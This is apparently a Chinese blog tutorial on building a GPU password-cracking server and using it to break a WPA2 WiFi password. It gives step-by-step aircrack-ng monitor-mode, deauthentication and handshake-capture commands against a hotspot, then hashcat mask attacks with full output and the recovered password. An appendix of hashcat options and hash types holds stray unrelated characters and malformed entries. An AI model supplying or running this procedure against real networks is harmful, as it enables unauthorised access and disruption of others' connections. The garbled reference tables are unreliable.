硬件環(huán)境:
主機: TYAN FT77D-B7109
CPU: Intel Xeon Scalable Processor
GPU: 1080Ti x 8 (測試時只用了兩塊, 分別是MSI/技嘉)
內(nèi)存: 32G
硬盤: 1T SSD
0x00 配置環(huán)境
0x01 安裝系統(tǒng)
目標(biāo)系統(tǒng): Ubuntu 18.04.1 LTS Desktop (建議安裝Server版)
在官網(wǎng)下載好啟動盤之后, 用燒錄工具(建議用win32diskimager)寫入U盤, 然后進入啟動項選為U盤啟動, 接下來開始安裝, 一路默認配置就好. 具體步驟請谷歌, 這里就不贅述了. (這里我們遇到一個坑, 就是插了PCIE網(wǎng)卡之后安裝系統(tǒng)一直重啟, 可能是主機的兼容性問題, 裝系統(tǒng)的時候如果條件允許, 最好把所有的外置設(shè)備卸載掉)
0x02 安裝GPU驅(qū)動
-
安裝好系統(tǒng)之后, 可以配置一下更新源(
/etc/apt/sources.list
,我用的是中科大源), update一下系統(tǒng).deb https://mirrors.ustc.edu.cn/ubuntu/ bionic main restricted universe multiverse deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic main restricted universe multiverse deb https://mirrors.ustc.edu.cn/ubuntu/ bionic-updates main restricted universe multiverse deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic-updates main restricted universe multiverse deb https://mirrors.ustc.edu.cn/ubuntu/ bionic-backports main restricted universe multiverse deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic-backports main restricted universe multiverse deb https://mirrors.ustc.edu.cn/ubuntu/ bionic-security main restricted universe multiverse deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic-security main restricted universe multiverse deb https://mirrors.ustc.edu.cn/ubuntu/ bionic-proposed main restricted universe multiverse deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic-proposed main restricted universe multiverse
sudo apt-get update && apt-get upgrade sudo apt-get install gcc make p7zip-full git lsb-core
-
然后將Nouveau(NVIDIA通用顯卡驅(qū)動)禁用:
sudo bash -c "echo blacklist nouveau > /etc/modprobe.d/blacklist-nvidia-nouveau.conf" sudo bash -c "echo options nouveau modeset=0 >> /etc/modprobe.d/blacklist-nvidia-nouveau.conf" sudo update-initramfs -u sudo reboot
-
等重啟之后, 再添加32位的NVIDIA驅(qū)動源:
sudo dpkg --add-architecture i386 sudo apt-get update sudo apt-get install build-essential libc6:i386
-
在官網(wǎng)下載驅(qū)動, 下載好之后:
chmod +x NVIDIA*.run sudo ./NVIDIA*.run sudo reboot
或者:
wget http://us.download.nvidia.com/XFree86/Linux-x86_64/375.26/NVIDIA-Linux-x86_64-375.26.run chmod +x NVIDIA-Linux-x86_64-375.26.run sudo ./NVIDIA-Linux-x86_64-375.26.run
-
(可選步驟)安裝CPU集成顯卡驅(qū)動:
wget http://registrationcenter-download.intel.com/akdlm/irc_nas/9019/opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz tar -xvf opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz cd opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25 ./install.sh
-
這時候可以看一下顯卡配置:
lspci | grep VGA
0x03 安裝hashcat
wget https://hashcat.net/files/hashcat-3.30.7z
7z x hashcat-3.30.7z
cd hashcat-3.30
這是個比較老的版本, 我用的aircrack跑出來的包用這個版本可以跑. 如果想嘗一下鮮也可以:
wget https://hashcat.net/files/hashcat-4.2.1.7z
順便測試一下速度(在解壓后的目錄里直接運行./example0.sh
即可):
Session..........: hashcat
Status...........: Bypass
Hash.Type........: MD5
Hash.Target......: example0.hash
Time.Started.....: Sat Oct 20 20:08:33 2018 (27 mins, 0 secs)
Time.Estimated...: Sat Oct 20 22:31:24 2018 (1 hour, 55 mins)
Guess.Base.......: File (example.dict), Right Side
Guess.Mod........: Mask (?a?a?a?a?a?a) [6], Left Side
Guess.Queue.Base.: 1/1 (100.00%)
Guess.Queue.Mod..: 1/1 (100.00%)
Speed.Dev.#2.....: 8340.3 MH/s (6.61ms) @ Accel:128 Loops:64 Thr:256 Vec:1
Speed.Dev.#3.....: 7938.7 MH/s (6.93ms) @ Accel:128 Loops:64 Thr:256 Vec:1
Speed.Dev.#*.....: 16279.0 MH/s
Recovered........: 3035/6494 (46.74%) Digests, 0/1 (0.00%) Salts
Recovered/Time...: CUR:25,N/A,N/A AVG:29,1773,42558 (Min,Hour,Day)
Progress.........: 26411945426944/139573552218112 (18.92%)
Rejected.........: 0/26411945426944 (0.00%)
Restore.Point....: 200933376/1073741824 (18.71%)
Candidates.#2....: sarusix102x -> 6o9momx49wy3c2
Candidates.#3....: sarseeethelia3 -> 6o9602eugeni
HWMon.Dev.#2.....: Temp: 79c Fan: 62% Util: 94% Core:1860MHz Mem:5005MHz Bus:16
HWMon.Dev.#3.....: Temp: 84c Fan: 78% Util: 94% Core:1771MHz Mem:5005MHz Bus:16
Started: Sat Oct 20 20:08:26 2018
Stopped: Sat Oct 20 20:35:35 2018
-
關(guān)于上面輸出的參數(shù)解析:
實際上example0.sh的命令如下: ./hashcat64.bin -t 32 -a 7 example0.hash ?a?a?a?a example.dict Session..........: Status...........: Hash.Type........: 表示哈希計算的類型 Hash.Target......: 表示目標(biāo)哈希表 Time.Started.....: 計算開始時間 Time.Estimated...: 估計結(jié)束時間 Guess.Base.......: 密碼字典 Guess.Mod........: 密碼類型(大小寫/數(shù)字等) Guess.Queue.Base.: Guess.Queue.Mod..: Speed.Dev.#2.....: 顯卡1的速度(8340.0MH/s 約等于每秒83億次運算) Speed.Dev.#3.....: 顯卡2... Speed.Dev.#*.....: 總速度 Recovered........: Recovered/Time...: 當(dāng)前已用時間(分,時,天); 平均需要時間(分,時,天) Progress.........: 當(dāng)前進度 Rejected.........: 應(yīng)該是丟包率(猜的) Restore.Point....: 當(dāng)前的進度 Candidates.#2....: 即將嘗試爆破的密碼(猜的) Candidates.#3....: HWMon.Dev.#2.....: Temp表示當(dāng)前顯卡溫度;Fan表示風(fēng)扇轉(zhuǎn)速;Men內(nèi)存頻率 HWMon.Dev.#3.....: Util表示內(nèi)存使用率;Core表示GPU核頻率;Bus通道數(shù)
-
關(guān)于hashcat命令參數(shù)解析(詳見附錄一):
-a 指定要使用的破解模式 -m 指定要破解的hash類型所對應(yīng)的id[下面有一份完整的hash id對照表],幾乎現(xiàn)在市面上常用的一些散列類型它都支持,而且每個版本更新都會增加一些新的算法 -o 指定破解成功后的hash及所對應(yīng)的明文密碼的存放位置,可以用它把破解成功的hash寫到指定的文件中 --force 忽略破解過程中的警告信息,跑單條hash可能需要加上此選項 --show 顯示已經(jīng)破解的hash及該hash所對應(yīng)的明文 --increment 啟用增量破解模式,你可以利用此模式讓hashcat在指定的密碼長度范圍內(nèi)執(zhí)行破解過程,其實,并不建議這么用,因為破解時間可能會比較長 --increment-min 密碼最小長度,后面直接等于一個整數(shù)即可,配置increment模式一起使用 --increment-max 密碼最大長度,同上 --outfile-format 指定破解結(jié)果的輸出格式id,一般自己常用3 --username 忽略hash文件中的指定的用戶名,在破解win和linux系統(tǒng)用戶密碼hash可能會用到 --remove 刪除已被破解成功的hash -r 使用自定義破解規(guī)則,這個后期抽空再說吧,比較的復(fù)雜,不是一兩句話能說完的
-
真實爆破WiFi密碼情況系hashcat參數(shù)解析:
./hashcat64.bin -m 2500 -a 3 wpahash.hccap ?l?l?l?l?l?l?l?l
-m : hash的類型, 2500代表的是WPA/WPA2協(xié)議. 詳見[② Hash種類](② Hash種類)
-a: 有多種參數(shù), 3表示窮舉. 詳見[⑤ 攻擊模式](#⑤ 攻擊模式)
*.hccap: 即為
aircrack
抓到的包之后轉(zhuǎn)化而來的?l: 表示所有的小寫字母. 詳見[⑥ 內(nèi)置字符集](⑥ 內(nèi)置字符集)
0x10 Crack實戰(zhàn)
0x11 初始配置
-
首先需要找一個可以監(jiān)聽注入的USB網(wǎng)卡, 如果筆記本自帶網(wǎng)卡能用就更好了. 這里以
rt2800usb
為例講解:root@ks:/home/ks# airmon-ng PHY Interface Driver Chipset phy0 wlp3s0 iwlwifi Intel Corporation Device 24fb (rev 10) phy1 wlx7cdd90f1f416 rt2800usb Ralink Technology, Corp. RT2870/RT3070
可以看到, 有兩張網(wǎng)卡,
wlp3s0
是筆記本自帶的英特爾系列網(wǎng)卡;lx7cdd90f1f416
是能夠監(jiān)聽的新插入的usb網(wǎng)卡. -
查看網(wǎng)卡狀態(tài), 兩張網(wǎng)卡的Mode都是
Managed
:root@ks:/home/ks# iwconfig wlx7cdd90f1f416 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=off Retry short long limit:2 RTS thr:off Fragment thr:off Encryption key:off Power Management:off lo no wireless extensions. wlp3s0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=off Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:on enp2s0 no wireless extensions. enp0s20f0u1 no wireless extensions.
-
為了避免沖突, 先殺占用進程
root@ks:/home/ks# airmon-ng check kill Killing these processes: PID Name 891 wpa_supplicant 3091 dhclient 4430 avahi-daemon 4431 avahi-daemon
-
然后將能夠抓包的網(wǎng)卡的Mode設(shè)為
Monitor
root@ks:/home/ks# airmon-ng start wlx7cdd90f1f416 Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill' PID Name 7674 avahi-daemon 7675 avahi-daemon PHY Interface Driver Chipset phy0 wlp3s0 iwlwifi Intel Corporation Device 24fb (rev 10) phy4 wlx7cdd90f1f416 rt2800usb Ralink Technology, Corp. RT2870/RT3070 wlx7cdd90f1f416 is soft blocked, please run "rfkill unblock wlx7cdd90f1f416" to use this interface. rfkill error, unable to start wlx7cdd90f1f416 Would you like to try and automatically resolve this? [y/n] y rfkill error: rfkill: invalid identifier: 4 Unable to unblock. Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name. (mac80211 monitor mode vif enabled on [phy4]wlan0mon (mac80211 station mode vif disabled for [phy4]wlx7cdd90f1f416)
-
此時再看一下無線網(wǎng)卡狀態(tài):
root@ks:/home/ks# iwconfig lo no wireless extensions. wlp3s0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:on wlan0mon IEEE 802.11 Mode:Monitor Tx-Power=off Retry short long limit:2 RTS thr:off Fragment thr:off Power Management:off enp2s0 no wireless extensions. enp0s20f0u1 no wireless extensions.
已更改~
0x12 實施攻擊
-
我們的攻擊目標(biāo)是
iPhone
:root@ks:/home/ks# airodump-ng wlan0mon
上圖可看到它的mac是74:D2:1D:AE:3F:94
, 信道(CH)是1
. (記住這兩個信息下面有用)
-
接下來我們開兩個shell, 一個shell負責(zé)監(jiān)聽握手包, 另一個shell負責(zé)洪荒攻擊兩個正常連接的WiFi設(shè)備, 我們先看看第一個shell:
airodump-ng --bssid 74:D2:1D:AE:3F:94 -c 1 -w test wlan0mon
可以看出來已經(jīng)抓到了握手包703個. 對命令參數(shù)解釋如下:
--bssid: 表示W(wǎng)iFi熱點的mac
-c: 表示信道1
-w: 后面跟著文件名
wlan0mon: 需要監(jiān)聽的網(wǎng)卡
-
開啟了監(jiān)聽之后, 我們就需要DDoS目標(biāo)連接了, 這時候在另一個shell輸入如下命令:
aireplay-ng --deauth 5 -a 74:D2:1D:AE:3F:94 wlan0mon
隔幾秒發(fā)一次, 以抓到足夠的握手包, 減少爆破的時間.
0x20 開始爆破
在上面操作的監(jiān)聽過程中, 會在當(dāng)前路徑下保存一個抓到的握手包的數(shù)據(jù), 但這個流量包還不能直接讓hashcat跑, 需要做簡單的處理, 先做一個簡單的數(shù)據(jù)清洗:
root@ks:~/crack_packet_wifi# wpaclean wpapass.cap test-05.cap
Pwning test-05.cap (1/1 100%)
Net 74:d2:1d:ae:3f:94 iPhone
Done
可以看到, 已經(jīng)成功識別出目標(biāo)無限的mac. 接下來我們吧數(shù)據(jù)包轉(zhuǎn)換成hashcat能夠識別的hash類型:
root@ks:/home/ks/software/crack_pw/crack_packet_wifi# aircrack-ng wpapass.cap -J wpahash
Opening wpapass.cap
Read 3 packets.
# BSSID ESSID Encryption
1 74:D2:1D:AE:3F:94 iPhone WPA (1 handshake)
Choosing first network as target.
Opening wpapass.cap
Reading packets, please wait...
Building Hashcat (1.00) file...
[*] ESSID (length: 6): iPhone
[*] Key version: 2
[*] BSSID: 74:D2:1D:AE:3F:94
[*] STA: 88:C9:D0:B7:2C:36
[*] anonce:
E6 A3 D9 3C 95 77 3E 0B 5D 84 CE 65 0D 1C EB 59
E4 E4 E3 A5 3A 07 FE D8 47 A1 7C 77 10 66 DC E4
[*] snonce:
03 8D 9F 6B A8 4B 27 7D 8E 02 57 56 34 D9 98 2A
4D 36 1C EA 2D 6A 91 43 4F 30 67 96 81 14 F4 AD
[*] Key MIC:
21 51 2B 3C 6F 37 CA 9E 09 6C 92 74 45 DC DA 11
[*] eapol:
01 03 00 75 02 01 0A 00 00 00 00 00 00 00 00 00
03 03 8D 9F 6B A8 4B 27 7D 8E 02 57 56 34 D9 98
2A 4D 36 1C EA 2D 6A 91 43 4F 30 67 96 81 14 F4
AD 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC
04 01 00 00 0F AC 02 80 00
Successfully written to wpahash.hccap
Quitting aircrack-ng...
接下來就是直接放到爆破的服務(wù)器上跑(實測用最新版的hashcat跑不了, 這里用了3.30版本的hashcat)
./hashcat64.bin -m 2500 -a 3 wpahash.hccap ?d?d?d?d?d?d?d?d
幾秒鐘就跑出來了:
?```
Session..........: hashcat
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: iPhone (74:d2:1d:ae:3f:94 <-> 88:c9:d0:b7:2c:36)
Time.Started.....: Tue Oct 23 17:43:18 2018 (3 secs)
Time.Estimated...: Tue Oct 23 17:44:52 2018 (1 min, 31 secs)
Input.Mask.......: ?d?d?d?d?d?d?d?d [8]
Input.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....: 535.2 kH/s (6.23ms)
Speed.Dev.#3.....: 527.7 kH/s (6.34ms)
Speed.Dev.#*.....: 1062.9 kH/s
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 2207744/100000000 (2.21%)
Rejected.........: 0/2207744 (0.00%)
Restore.Point....: 0/10000000 (0.00%)
Candidates.#2....: 42345678 -> 41875555
Candidates.#3....: 40689823 -> 49471088
HWMon.Dev.#2.....: Temp: 41c Fan: 29% Util: 97% Core:1860Mhz Mem:5005Mhz Lanes:16
HWMon.Dev.#3.....: Temp: 41c Fan: 0% Util: 97% Core:1809Mhz Mem:5005Mhz Lanes:16
iPhone:74d21dae3f94:88c9d0b72c36:67854312
假設(shè)我們把它設(shè)置成全字符爆破, 也就是:
./hashcat64.bin -m 2500 -a 3 wpahash.hccap ?a?a?a?a?a?a?a?a
則需要幾百年(可見, 如果知道WiFi密碼的字符組成結(jié)構(gòu), 也就成功了一半了):
Session..........: hashcat
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: iPhone (74:d2:1d:ae:3f:94 <-> 88:c9:d0:b7:2c:36)
Time.Started.....: Tue Oct 23 17:53:33 2018 (31 secs)
Time.Estimated...: Fri Dec 24 03:40:44 2021 (200 years, 198 days)
Input.Mask.......: ?a?a?a?a?a?a?a?a [8]
Input.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....: 531.0 kH/s (6.38ms)
Speed.Dev.#3.....: 517.3 kH/s (6.52ms)
Speed.Dev.#*.....: 1048.3 kH/s
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 31854592/6634204312890625 (0.00%)
Rejected.........: 0/31854592 (0.00%)
Restore.Point....: 0/69833729609375 (0.00%)
Candidates.#2....: E]_LINAN -> E;$.1988
Candidates.#3....: Narinane -> N"XZANAN
HWMon.Dev.#2.....: Temp: 66c Fan: 47% Util: 97% Core:1809Mhz Mem:5005Mhz Lanes:16
HWMon.Dev.#3.....: Temp: 65c Fan: 34% Util: 97% Core:1759Mhz Mem:5005Mhz Lanes:16
參考鏈接
- How to build a 8 GPU password cracker
- Running HashCat on Ubuntu 18.04 Server with 1080TI
- How to Build a Password Cracker with NVidia GTX 1080TI & GTX 1070
- 快速破解各種散列hash hashcat入門篇
- aircrack & hashcat 非字典高速破解目標(biāo)無線密碼
- 用hashcat超速破解WiFi密碼
- 開源GPU密碼破解工具–HashCat
- hashcat 幫助文件 中文翻譯
- Hashcat用戶手冊——直接攻擊模式的使用
附錄一
① hashcat選項解釋
用法:
hashcat [選項]... hash|hash文件|hccapx文件 [字典|掩碼|目錄]...
選項 縮寫 / 原文 | 參數(shù)類型 | 描述 | 用例 |
---|---|---|---|
-m,--hash-type | 數(shù)字 | Hash種類,參見下面的參考 | -m 1000 |
-a,--attack-mode | 數(shù)字 | 攻擊模式悟狱,參見下面的參考 | -a 3 |
-V,--version | 輸出版本信息 | ||
-h,--help | 輸出幫助信息 | ||
--quiet | 禁用輸出 | ||
--hex-charset | 字符集以十六進制形式給出 | ||
--hex-salt | 鹽以十六進制形式給出 | ||
--hex-wordlist | 字典中的單詞是以十六進制形式給出的 | ||
--force | 忽略警告 | ||
--status | 自動更新屏幕 | ||
--status-timer | 數(shù)字 | 設(shè)置自動更新屏幕間隔為X秒 | --status-timer=1 |
--machine-readable | 以機器可讀格式顯示狀態(tài)視圖 | ||
--keep-guessing | 被破解之后繼續(xù)猜測Hash | ||
--loopback | 在induction目錄中加入新的純文本文件 | ||
--weak-hash-threshold | 數(shù)字 | 當(dāng)閾值為X時停止檢查弱Hash | --weak=0 |
--markov-hcstat | 文件 | 指定要使用的hcstat文件 | --markov-hc=my.hcstat |
--markov-disable | 禁用馬爾可夫鏈,模仿經(jīng)典暴力破解 | ||
--markov-classic | 啟用經(jīng)典馬爾可夫鏈,無任何位置 | ||
-t,--markov-threshold | 數(shù)字 | 當(dāng)閾值X時停止接收新的馬爾科夫鏈 | -t 50 |
--runtime | 數(shù)字 | 運行X秒后中止會話 | --runtime=10 |
--session | 字符串 | 定義具體的會話名稱 | --session=mysession |
--restore | 從--session恢復(fù)會話 | ||
--restore-disable | 不寫入恢復(fù)文件 | ||
--restore-file-path | 文件 | 指定恢復(fù)文件的路徑 | --restore-file-path=my.restore |
-o,--outfile | 文件 | 定義恢復(fù)的Hash的輸出文件 | -o outfile.txt |
--outfile-format | 數(shù)字 | 定義恢復(fù)的Hash的輸出格式绅络,參見下面的參考 | --outfile-format=7 |
--outfile-autohex-disable | 在輸出純文本文件中禁用$HEX[] | ||
--outfile-check-timer | 數(shù)字 | 設(shè)置輸出文件檢查間隔為X秒 | --outfile-check=30 |
-p,--separator | 字符 | Hash表和輸出文件的分隔符 | -p : |
--stdout | 不破解Hash挨队,只打印候選值 | ||
--show | 比較Hash表和pot文件弧可,顯示已破解的Hash | ||
--left | 比較Hash表和pot文件蔑匣,顯示未破解的Hash | ||
--username | 忽略Hash文件中的用戶名 | ||
--remove | 一旦破解,就刪除Hash | ||
--remove-timer | 數(shù)字 | 每X秒更新輸入的Hash文件 | --remove-timer=30 |
--potfile-disable | 不寫入pot文件 | ||
--potfile-path | 目錄 | 指定pot文件的路徑 | --potfile-path=my.pot |
--debug-mode | 數(shù)字 | 定義調(diào)試模式(僅通過使用規(guī)則進行混合) | --debug-mode=4 |
--debug-file | 文件 | 調(diào)試規(guī)則的輸出文件 | --debug-file=good.log |
--induction-dir | 目錄 | 指定loopback的induction目錄 | --induction=inducts |
--outfile-check-dir | 目錄 | 指定監(jiān)控純文本文件的輸出目錄 | --outfile-check-dir=x |
--logfile-disable | 禁用日志文件 | ||
--hccapx-message-pair | 數(shù)字 | 只從hccapx加載匹配X的消息對 | --hccapx-message-pair=2 |
--nonce-error-corrections | 數(shù)字 | 用BF大小范圍來取代AP最后字節(jié)的隨機數(shù) | --nonce-error-corrections=16 |
--truecrypt-keyfiles | 文件 | 要使用的密匙文件棕诵,用逗號分隔 | --truecrypt-key=x.png |
--veracrypt-keyfiles | 文件 | 要使用的密匙文件裁良,用逗號分隔 | --veracrypt-key=x.txt |
--veracrypt-pim | 數(shù)字 | VeraCrypt的頭部密鑰生成的迭代次數(shù)(PIM) | --veracrypt-pim=1000 |
-b,--benchmark | 運行基準(zhǔn)測試 | ||
--speed-only | 返回預(yù)期的攻擊速度,然后退出 | ||
--progress-only | 返回理想進度的步驟大小和處理時間 | ||
-c,--segment-size | 數(shù)字 | 為wordfile設(shè)置 X MB緩存 | -c 32 |
--bitmap-min | 數(shù)字 | 設(shè)置位圖最小為X位(bit) | --bitmap-min=24 |
--bitmap-max | 數(shù)字 | 設(shè)置位圖最大為X位(bit) | --bitmap-max=24 |
--cpu-affinity | 字符串 | 設(shè)置CPU相關(guān)性年鸳,用逗號分隔 | --cpu-affinity=1,2,3 |
-I,--opencl-info | 顯示檢測到的OpenCL平臺/設(shè)備的信息 | -I | |
--opencl-platforms | 字符串 | 要使用的OpenCL平臺趴久,用逗號分隔 | --opencl-platforms=2 |
-d,--opencl-devices | 字符串 | 要使用的OpenCL設(shè)備丸相,用逗號分隔 | -d 1 |
-D,--opencl-device-types | 字符串 | 要使用的OpenCL設(shè)備類型搔确,用逗號分隔 | -D 1 |
--opencl-vector-width | 數(shù)字 | 手動覆蓋OpenCL矢量寬度為X | --opencl-vector=4 |
-w,--workload-profile | 數(shù)字 | 設(shè)置工作負載配置文件,參見下面的參考 | -w 3 |
-n,--kernel-accel | 數(shù)字 | 手動調(diào)整工作負載灭忠,將外圈步長設(shè)置為X | -n 64 |
-u,--kernel-loops | 數(shù)字 | 手動調(diào)整工作負載膳算,將內(nèi)圈步長設(shè)置為X | -u 256 |
--nvidia-spin-damp | 數(shù)字 | 可變通NVIDIA處理器熱循環(huán)Bug,用百分比表示 | --nvidia-spin-damp=50 |
--gpu-temp-disable | 禁用GPU溫度和風(fēng)扇速度的讀取和觸發(fā) | ||
--gpu-temp-abort | 數(shù)字 | 如果GPU溫度達到X攝氏度弛作,則中止 | --gpu-temp-abort=100 |
--gpu-temp-retain | 數(shù)字 | 嘗試將GPU溫度保持在X攝氏度 | --gpu-temp-retain=95 |
--powertune-enable | 啟用電源調(diào)整涕蜂。 完成后恢復(fù)設(shè)置 | ||
--scrypt-tmto | 數(shù)字 | 手動覆蓋scrypt的TMTO值為X | --scrypt-tmto=3 |
-s,--skip | 數(shù)字 | 跳過前X個單詞 | -s 1000000 |
-l,--limit | 數(shù)字 | 跳過單詞后限制X個單詞 | -l 1000000 |
--keyspace | 顯示密鑰空間base:mod值后退出 | ||
-j,--rule-left | 規(guī)則 | 單個規(guī)則應(yīng)用于字典中左側(cè)的每個單詞 | -j 'c' |
-k,--rule-right | 規(guī)則 | 單個規(guī)則應(yīng)用于字典中右側(cè)的每個單詞 | -k '^-' |
-r,--rules-file | 文件 | 多個規(guī)則應(yīng)用于字典中的每個單詞 | -r rules/best64.rule |
-g,--generate-rules | 數(shù)字 | 生成X個隨機規(guī)則 | -g 10000 |
--generate-rules-func-min | 數(shù)字 | 強制每個規(guī)則最小X個函數(shù) | |
--generate-rules-func-max | 數(shù)字 | 強制每個規(guī)則最大X個函數(shù) | |
--generate-rules-seed | 數(shù)字 | 強制RNG種子設(shè)置為X | |
-1,--custom-charset1 | 字符集 | 用戶定義的字符集 ?1 | -1 ?l?d?u |
-2,--custom-charset2 | 字符集 | 用戶定義的字符集 ?2 | -2 ?l?d?s |
-3,--custom-charset3 | 字符集 | 用戶定義的字符集 ?3 | |
-4,--custom-charset4 | 字符集 | 用戶定義的字符集 ?4 | |
-i,--increment | 啟用掩碼增量模式 | ||
--increment-min | 數(shù)字 | 在X處開始掩碼遞增 | --increment-min=4 |
--increment-max | 數(shù)字 | 在X處停止掩碼遞增 | --increment-max=8 |
② Hash種類
編號 | 名稱 | 類別 |
---|---|---|
900 | MD4 | 純Hash |
0 | MD5 | 純Hash |
5100 | Half MD5 | 純Hash |
100 | SHA1 | 純Hash |
1300 | SHA-224 | 純Hash |
1400 | SHA-256 | 純Hash |
10800 | SHA-384 | 純Hash |
1700 | SHA-512 | 純Hash |
5000 | SHA-3 (Keccak) | 純Hash |
10100 | SipHash | 純Hash |
6000 | RIPEMD-160 | 純Hash |
6100 | Whirlpool | 純Hash |
6900 | GOST R 34.11-94 | 純Hash |
11700 | GOST R 34.11-2012 (Streebog) 256-bit | 純Hash |
11800 | GOST R 34.11-2012 (Streebog) 512-bit | 純Hash |
10 | md5(salt) | 純Hash,鹽 且/或 多次迭代 |
20 | md5(pass) | 純Hash映琳,鹽 且/或 多次迭代 |
30 | md5(unicode(salt) | 純Hash机隙,鹽 且/或 多次迭代 |
40 | md5(pass)) | 純Hash蜘拉,鹽 且/或 多次迭代 |
3800 | md5(pass.$salt) | 純Hash,鹽 且/或 多次迭代 |
3710 | md5(pass)) | 純Hash有鹿,鹽 且/或 多次迭代 |
4010 | md5(salt.$pass)) | 純Hash旭旭,鹽 且/或 多次迭代 |
4110 | md5(pass.$salt)) | 純Hash,鹽 且/或 多次迭代 |
2600 | md5(md5($pass)) | 純Hash葱跋,鹽 且/或 多次迭代 |
3910 | md5(md5(salt)) | 純Hash持寄,鹽 且/或 多次迭代 |
4300 | md5(strtoupper(md5($pass))) | 純Hash,鹽 且/或 多次迭代 |
4400 | md5(sha1($pass)) | 純Hash娱俺,鹽 且/或 多次迭代 |
110 | sha1(salt) | 純Hash稍味,鹽 且/或 多次迭代 |
120 | sha1(pass) | 純Hash,鹽 且/或 多次迭代 |
130 | sha1(unicode(salt) | 純Hash荠卷,鹽 且/或 多次迭代 |
140 | sha1(pass)) | 純Hash模庐,鹽 且/或 多次迭代 |
4500 | sha1(sha1($pass)) | 純Hash,鹽 且/或 多次迭代 |
4520 | sha1(pass)) | 純Hash油宜,鹽 且/或 多次迭代 |
4700 | sha1(md5($pass)) | 純Hash赖欣,鹽 且/或 多次迭代 |
4900 | sha1(pass.$salt) | 純Hash,鹽 且/或 多次迭代 |
14400 | sha1(CX) | 純Hash验庙,鹽 且/或 多次迭代 |
1410 | sha256(salt) | 純Hash顶吮,鹽 且/或 多次迭代 |
1420 | sha256(pass) | 純Hash,鹽 且/或 多次迭代 |
1430 | sha256(unicode(salt) | 純Hash粪薛,鹽 且/或 多次迭代 |
1440 | sha256(pass)) | 純Hash悴了,鹽 且/或 多次迭代 |
1710 | sha512(salt) | 純Hash,鹽 且/或 多次迭代 |
1720 | sha512(pass) | 純Hash违寿,鹽 且/或 多次迭代 |
1730 | sha512(unicode(salt) | 純Hash湃交,鹽 且/或 多次迭代 |
1740 | sha512(pass)) | 純Hash,鹽 且/或 多次迭代 |
50 | HMAC-MD5 (key = $pass) | 純Hash藤巢,認證的 |
60 | HMAC-MD5 (key = $salt) | 純Hash搞莺,認證的 |
150 | HMAC-SHA1 (key = $pass) | 純Hash,認證的 |
160 | HMAC-SHA1 (key = $salt) | 純Hash掂咒,認證的 |
1450 | HMAC-SHA256 (key = $pass) | 純Hash才沧,認證的 |
1460 | HMAC-SHA256 (key = $salt) | 純Hash,認證的 |
1750 | HMAC-SHA512 (key = $pass) | 純Hash绍刮,認證的 |
1760 | HMAC-SHA512 (key = $salt) | 純Hash温圆,認證的 |
14000 | DES (PT = pass) | 純加密,已知的明文攻擊 |
14100 | 3DES (PT = pass) | 純加密孩革,已知的明文攻擊 |
14900 | Skip32 (PT = pass) | 純加密岁歉,已知的明文攻擊 |
400 | phpass | 通用密鑰導(dǎo)出函數(shù)(KDF) |
8900 | scrypt | 通用密鑰導(dǎo)出函數(shù)(KDF) |
11900 | PBKDF2-HMAC-MD5 | 通用密鑰導(dǎo)出函數(shù)(KDF) |
12000 | PBKDF2-HMAC-SHA1 | 通用密鑰導(dǎo)出函數(shù)(KDF) |
10900 | PBKDF2-HMAC-SHA256 | 通用密鑰導(dǎo)出函數(shù)(KDF) |
12100 | PBKDF2-HMAC-SHA512 | 通用密鑰導(dǎo)出函數(shù)(KDF) |
23 | Skype | 網(wǎng)絡(luò)協(xié)議 |
2500 | WPA/WPA2 | 網(wǎng)絡(luò)協(xié)議 |
4800 | iSCSI CHAP authentication, MD5(CHAP) | 網(wǎng)絡(luò)協(xié)議 |
5300 | IKE-PSK MD5 | 網(wǎng)絡(luò)協(xié)議 |
5400 | IKE-PSK SHA1 | 網(wǎng)絡(luò)協(xié)議 |
5500 | NetNTLMv1 | 網(wǎng)絡(luò)協(xié)議 |
5500 | NetNTLMv1+ESS | 網(wǎng)絡(luò)協(xié)議 |
5600 | NetNTLMv2 | 網(wǎng)絡(luò)協(xié)議 |
7300 | IPMI2 RAKP HMAC-SHA1 | 網(wǎng)絡(luò)協(xié)議 |
7500 | Kerberos 5 AS-REQ Pre-Auth etype 23 | 網(wǎng)絡(luò)協(xié)議 |
8300 | DNSSEC (NSEC3) | 網(wǎng)絡(luò)協(xié)議 |
10200 | CRAM-MD5 | 網(wǎng)絡(luò)協(xié)議 |
11100 | PostgreSQL CRAM (MD5) | 網(wǎng)絡(luò)協(xié)議 |
11200 | MySQL CRAM (SHA1) | 網(wǎng)絡(luò)協(xié)議 |
11400 | SIP digest authentication (MD5) | 網(wǎng)絡(luò)協(xié)議 |
13100 | Kerberos 5 TGS-REP etype 23 | 網(wǎng)絡(luò)協(xié)議 |
121 | SMF (Simple Machines Forum) > v1.1 | 論壇,內(nèi)容管理系統(tǒng)(CMS)膝蜈,電子商務(wù)锅移,框架 |
